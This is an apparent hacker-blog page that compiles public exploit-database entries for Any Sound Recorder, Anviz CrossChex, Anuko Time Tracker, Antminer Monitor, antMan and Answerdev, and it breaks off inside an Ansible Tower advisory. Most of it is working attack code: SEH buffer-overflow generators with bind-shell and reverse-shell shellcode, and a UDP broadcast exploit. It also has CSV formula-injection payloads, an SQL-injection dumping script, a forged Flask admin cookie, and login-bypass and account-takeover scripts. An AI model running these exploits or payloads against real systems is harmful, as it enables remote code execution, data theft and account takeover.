# Exploit Title: Any Sound Recorder 2.93 - Denial of Service (PoC)
# Date: 2018-09-09
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.any-sound-recorder.com
# Software: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: Any Sound Recorder 2.93
# Tested on: Windows 7 SP1 x86
#!/usr/bin/python
import struct
print"""
#1. Download and install the setup file
#2. A file "Byte.txt" will be created
#3. Click Help > Enter key code... in tool bar
#4. Copy the contents of the file (Byte.txt) and paste in the Username Name field
#5. Click Register and BOOMMMM !!!!
totalsize = 7000 # total size buff
buffer= "\x41" * 900 #Offset
nseh= "BBBB" # next seh address
seh= "CCCC" # seh address
shellcode= "T" * (totalsize-len(buffer+nseh+seh))
payload = buffer + nseh + seh + shellcode
try:
f=open("Byte.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863108962
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when
with the name "hack.txt". Copy the content of the "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
},
'License' => MSF_LICENSE,
'Author' =>
[
'Abdullah Alıç', # Original discovery
'd3ckx1 d3ck(at)qq.com', # MSF module
],
'References' =>
[
[ 'OSVDB', '' ],
[ 'EBD', '45627' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'Space' => 10000
},
'Targets' =>
[
[ 'Any Sound Recorder 2.93',
{
'Ret' => 0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3
'Offset' => 900
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 25 2018',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class)
end
def exploit
buf = "\x90"*(target['Offset'])
buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
buf << [target.ret] .pack('V') # seh
buf << make_nops(10)
buf << payload.encoded
buf << "\x90" * 200
file_create(buf)
handler
end
end
# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: 2.93
# Tested on: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the "boom.txt".
# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
# Connect victim machine on port 4444
#!/usr/bin/python
#Payload size: 355 bytes
#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7"
buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6"
buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b"
buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92"
buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b"
buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85"
buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d"
buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07"
buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0"
buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08"
buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d"
buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26"
buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e"
buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce"
buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d"
buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82"
buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80"
buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9"
buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19"
buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54"
buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4"
buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05"
buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f"
buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a"
buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b"
buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62"
buf += "\x98\x86\x36\xa7"
junk = 10000
nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes
seh= "\x35\x2f\xd1\x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv
buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf))
payload = buffer
#badchars \x00 \x0a \x0d
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html
import socket
import time
import sys
import binascii
# Scapy for the broadcast packet with custom sport
from scapy.all import Raw,IP,Dot1Q,UDP,Ether
import scapy.all
# shellcode working calc.exe
calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
# shellcode windows x86 reverse_shell
shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"
# shellcode windows x86 reverse_shell (part_2)
shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
def ipToShellcode(ip):
a = ip.split('.')
b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
b = b.replace("0x","")
return binascii.unhexlify(b)
# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
request = b"A"*77 # Original payload substitute
request += b"B"*184
request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe
request += b"A"*4
# 269 bytes
if len(sys.argv) > 2:
request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
else:
request = request + calculator_payload
scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
def setFuzzUDPServer(ip='', port=5050, timeout=150):
try :
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print('[!] Failed to create server socket')
try:
s.bind(('', port))
except:
print('[*] Server socket bind failed')
sys.exit()
print('[*] Waiting for crosschex')
s.settimeout(timeout)
timeout = time.time() + timeout
responses = []
while True:
if time.time() > timeout:
break
try:
response = s.recvfrom(1024)
print(response)
responses.append(response)
sendFuzzingUDPBroadcast(ip=ip)
response = s.recvfrom(1024)
except socket.timeout:
print("[!] Error with UDP server")
s.close()
return responses
nargs = len(sys.argv)
if nargs < 2:
print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
sys.exit(0)
setFuzzUDPServer()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw,
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end
def exploit
connect_udp
res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end
print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded
udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
# Exploit Title: Anviz AIM CrossChex Standard 4.3 - CSV Injection
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-11-01
# Vendor: Anviz Biometric Technology Co., Ltd.
# Product web page: https://www.anviz.com
# Affected version: 4.3.6.0
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# CVE: N/A
# References
# Advisory ID: ZSL-2018-5498
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php
# Desc: CSV (XLS) Injection (Excel Macro Injection or Formula
# Injection) exists in the AIM CrossChex 4.3 when importing
# or exporting users using xls Excel file. This can be exploited
# to execute arbitrary commands on the affected system via
# SE attacks when an attacker inserts formula payload in the
# 'Name' field when adding a user or using the custom fields
# 'Gender', 'Position', 'Phone', 'Birthday', 'Employ Date'
# and 'Address'. Upon importing, the application will launch
# Excel program and execute the malicious macro formula.
# PoC
# From the menu:
User -> Add -> use payload: =cmd|' /C mspaint'!L337
User -> Import / Export: use payload: =cmd|' /C mspaint'!L337
# Exploit Title: Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection
# Date: 2020-10-17
# Exploit Author: Mufaddal Masalawala
# Vendor Homepage: https://www.anuko.com/ <https://berrnd.de/>
# Software Link: https://www.anuko.com/time-tracker/index.htm
# Version: 1.19.23.5325
# Tested on: Kali Linux 2020.3
# CVE: CVE-2020-15255
# Proof Of Concept:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
Reports feature in Anuko Time Tracker v1.19.23.5311 via User, Project and
Note data field that is mistreated while exporting to a CSV file.
To exploit this vulnerability:
1. Login to the application, goto 'User' module and edit the user
2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the
'Name' field
3. Goto 'Project' module, add a new project with the same malicious
payload in the 'Name' field
4. Goto 'Time' module, select our created User, Project and again enter
the same payload in 'Note' field
5. Enter the rest of the details and click 'Submit'
6. Now goto 'Reports' click Generateand download the CSV file
7. Open the CSV file, allow all popups and our payload is executed
(calculator is opened).
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - Password Reset Vulnerability leading to Account Takeover
#Date: 2020-11-11
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://www.anuko.com/
#Software Link: https://www.anuko.com/time-tracker/index.htm
#Version: 1.19.23.5311
#Tested on: Kali Linux 2020.3
#CVE: CVE-2020-27422
#Proof Of Concept:
In Anuko Time Tracker v1.19.23.5311 and prior, the password reset link
emailed to the user doesn't expire once used, hence the attacker could use
the same link to take over the victim's account. An Attacker needs to have
the link for successful exploitation. A malicious user could use the same
password reset link of the victim multiple times to take over the account.
To exploit this vulnerability:
1. Goto 'Password Reset' module and enter any user's login name
2. Reset the password using the password reset link received in the email
3. Use the same link again after resetting the password once
4. Password is changed again using the previously used link.
#Exploit Title: Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality
#Date: 2020-11-11
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://www.anuko.com/
#Software Link: https://www.anuko.com/time-tracker/index.htm
#Version: 1.19.23.5311
#Tested on: Kali Linux 2020.3
#CVE: CVE-2020-27423
#Proof Of Concept:
Anuko Time Tracker v1.19.23.5311 and prior, lacks rate limit on the
password reset module which allows attackers to perform Denial of Service
attack on any legitimate user's mailbox. Attacker could perform Denial of
Service on a legitimate user's mailbox
To exploit this vulnerability:
1. Goto 'Password Reset' module and enter any user's login name
2. Click on 'Reset Password' and capture this request.
3. Replay this request n number of times.
4. The victim receives a password reset email the number of times the
request is replayed.
# Exploit Title: Anuko Time Tracker - SQLi (Authenticated)
# Date: 2022-05-03
# Exploit Author: Altelus
# Vendor Homepage: https://www.anuko.com/
# Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d
# Version: Anuko Time Tracker 1.20.0.5640
# Tested on: Linux
# CVE : CVE-2022-24707
# An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled.
# User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed.
# The 'date' parameter is then injected with SQL payload for leaking database contents.
from time import time
import requests
import argparse
import re
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
def get_puncher_page():
punch_txt = r_client.get(host + "/puncher.php").text
if "Feature is disabled" in punch_txt:
print("[-] Puncher feature is disabled.")
exit(0)
print("[+] Puncher feature is enabled. Picking a project...")
soup = BeautifulSoup(punch_txt, features="lxml")
time_record_form = soup.find("select", {"name" : "project", "id" : "project"})
project_list = time_record_form.findAll("option")
if len(project_list) <= 1:
print("[-] No project to choose from")
exit(0)
f_proj = project_list[1]
print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text))
return f_proj['value']
def login(username, password):
global r_client
data = {
"login" : username,
"password" : password,
"btn_login" : "Login",
}
login_txt = r_client.post(host + "/login.php", data=data).text
if "Incorrect" in login_txt:
print("[-] Failed to login. Credentials are not correct.")
exit(0)
print("[+] Login successful!")
def start_puncher(project_id):
global r_client
data = {
"project": project_id,
"btn_start": "Start",
"browser_today" : "",
"browser_time" : "04:00",
"date": "{}-{}-{}".format(date.year, date.month, date.day)
}
headers = {
"Referer" : host + "/puncher.php"
}
start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text
if "Uncompleted entry already" in start_p:
print("[-] A running puncher entry is seen. Exiting")
exit(0)
print("[*] Puncher started. Getting id added...")
puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text
time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p)
time_edit_ids.sort()
latest_id = time_edit_ids[-1].split("=")[1]
return latest_id
def stop_puncher_sqli(project_id, sqli=""):
get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()"
if sqli == "":
sqli = get_all_tables
new_date = date+timedelta(minutes=10)
data = {
"btn_stop": "Stop",
"browser_today" : "",
"browser_time" : "04:10",
"date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day)
}
headers = {
"Referer" : host + "/puncher.php"
}
stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text
print("[*] Puncher stopped")
def get_puncher_result(puncher_id):
time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text
soup = BeautifulSoup(time_edit_p, features="lxml")
note_content = soup.find("textarea", {"name" : "note", "id" : "note"})
print("[+] Leaked: {}".format(note_content.text))
def delete_puncher_entry(puncher_id):
data = {
"delete_button" : "Delete",
"id" : puncher_id
}
headers = {
"Referer" : "http://10.0.2.15/time_delete.php?id={}".format(puncher_id)
}
del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers)
print("[*] Puncher {} deleted".format(puncher_id))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="Anuko Timetracker username")
parser.add_argument('--password', required=True, help="Anuko Timetracker password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables")
args = parser.parse_args()
r_client = requests.Session()
host = args.host
date = datetime.now()
username = args.username
password = args.password
login(username, password)
proj_id = get_puncher_page()
puncher_id = start_puncher(proj_id)
sqli=""
if args.sqli != None:
sqli = args.sqli
stop_puncher_sqli(proj_id, sqli=sqli)
get_puncher_result(puncher_id)
delete_puncher_entry(puncher_id)
# Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass
# Date: 09/06/2021
# Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22
# Exploit Author: CQR.company / Vulnz.
# Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor
# Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/
# Version: 0.5.0
# Tested on: Windows, Linux, Macos
Software is commonly used for Monitoring antminers and could easily be
found in zoomeye ( 800), shodan ( 500).
For now this is the most popular antminer monitoring tool.
Vulnerability in Antminer Monitor exists because of backdoor or
misconfiguration done
by developer inside settings file in flask server.
Settings file has a predefined secret string, which would be randomly
generated, however it is static in this
build.antminer-monitor/settings.py at
5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor ·
GitHub <https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py>
Secret key is 'super secret key'.
Based on this information we can craft authorization bypass cookies.
Using software flask-unsing we can generate cookie which will provide
you admin access.
flask-unsign --sign --cookie "{'_fresh': True, '_id':
b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6',
'_user_id': '1', 'csrf_token':
b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret
key"
Additionally you can use this universal cookie to access web interface
of flask application.
This cookie can work on all systems in "session" field.
.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU
In addition DEBUG = True which means /console works, however it needs pin.
# Exploit Title: antMan <= 0.9.0c Authentication Bypass
# Date: 02-27-2018
# Software Link: https://www.antsle.com
# Version: <= 0.9.0c
# Tested on: 0.9.0c
# Exploit Author: Joshua Bowser
# Contact: joshua.bowser@codecatoctin.com
# Website: http://www.codecatoctin.com
# Category: web apps
1. Description
antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console.
http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html
2. Proof of Concept
The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Java’s ProcessBuilder class to invoke, as root, a bash script called antsle-auth.
This script contains two critical defects that allow an attacker to bypass the authentication checks. By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer.
To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:
#-------------------------
POST /login HTTP/1.1
Host: 10.1.1.7:3000
[snip]
username= > &password=%0a
#-------------------------
You will now be successfully authenticated to antMan as the administrative root user.
3. Solution:
Update to version 0.9.1a
# Exploit Title: antMan <= 0.9.0c Authentication Bypass
# Date: 02-27-2018
# Software Link: https://www.antsle.com
# Version: <= 0.9.0c
# Tested on: 0.9.0c
# Exploit Author: Joshua Bowser
# Contact: joshua.bowser@codecatoctin.com
# Website: http://www.codecatoctin.com
# Category: web apps
1. Description
antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console.
http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html
2. Proof of Concept
The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Java’s ProcessBuilder class to invoke, as root, a bash script called antsle-auth.
This script contains two critical defects that allow an attacker to bypass the authentication checks. By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer.
To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:
#-------------------------
POST /login HTTP/1.1
Host: 10.1.1.7:3000
[snip]
username= > &password=%0a
#-------------------------
You will now be successfully authenticated to antMan as the administrative root user.
3. Solution:
Update to version 0.9.1a
# Exploit Title: Answerdev 1.0.3 - Account Takeover
# Date: Reported on Jan 24th 2023
# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp
# Vendor Homepage: https://answer.dev/
# Software Link: https://github.com/answerdev/answer
# Version: 1.0.3
# Tested on: Ubuntu 22.04 / Debian 11
# CVE : CVE-2023-0744
from sys import argv
import urllib3
from requests import post
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def ato(url: list, email: str) -> str:
try:
return f"Your Link: {''.join(url)}users/password-reset?code=" + \
post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]
except Exception as err:
return f"Cant reach URL: {err}"
if __name__ == "__main__":
if len(argv) != 3:
print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
exit()
print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))
SEC Consult Vulnerability Lab Security Advisory < 20150113-1 >
=======================================================================
title: Privilege Escalation & XSS & Missing Authentication
product: Ansible Tower
vulnerable version: <=2.0.2
fixed version: >=2.0.5
impact: high
homepage: http://www.ansible.com/tower
found: 2014-10-15
by: Manuel Hofer
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Ansible Tower is the easy-to-use UI and dashboard and REST API for Ansible.
Centralize your Ansible infrastructure from a modern UI, featuring role-based
access control, job scheduling, and graphical inventory management. Tower's
REST API and CLI make it easy to embed Tower into existing tools and processes.
Tower now includes real-time output of playbook runs, an all-new dashboard and
expanded out-of-the-box cloud support."
source: http://www.ansible.com/tower
Business recommendation:
------------------------
Attackers are able to elevate privileges and gain full control over Ansible
Tower and therefore access to sensitive data of other customers.
It is assumed that further vulnerabilities exist as only a short crash test has
been performed. Therefore it is recommended to perform a thorough security
review by security professionals.
Vulnerability overview/description:
-----------------------------------
1) Privilege Escalation
